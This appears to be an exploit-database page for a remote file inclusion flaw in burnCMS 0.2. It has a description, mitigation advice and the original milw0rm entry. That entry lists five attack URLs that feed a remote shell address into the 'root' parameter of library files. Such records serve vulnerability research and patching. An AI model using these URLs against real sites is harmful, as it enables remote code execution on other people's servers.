header-logo
Suggest Exploit
vendor:
burnCMS
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: burnCMS
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

burnCMS <= 0.2 (root) Remote File Include Vulnerabilities

The burnCMS version 0.2 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting malicious code into the 'root' parameter in various files like 'authuser.php', 'misc.php', 'connect.php', 'mysql.class.php', and 'postgres.class.php'. This allows the attacker to include and execute arbitrary files from remote servers, potentially leading to remote code execution.

Mitigation:

Update to the latest version of burnCMS or apply a patch that fixes the remote file inclusion vulnerability. Additionally, input validation and sanitization should be implemented to prevent such vulnerabilities.
Source

Exploit-DB raw data:

# burnCMS <= 0.2(root)Remote File Include Vulnerablities
# D.Script: http://www.burnstone.ch/downloads/burnCMS-0.2.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path_burnCMS]/lib/authuser.php?root=Shell
# Exploit:[Path_burnCMS]/lib/misc.php?root=Shell
# Exploit:[Path_burnCMS]/lib/connect.php?root=Shell
# Exploit:[Path_burnCMS]/lib/db/mysql.class.php?root=Shell
# Exploit:[Path_burnCMS]/lib/db/postgres.class.php?root=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & cRiMiNaL NeT

# milw0rm.com [2007-04-27]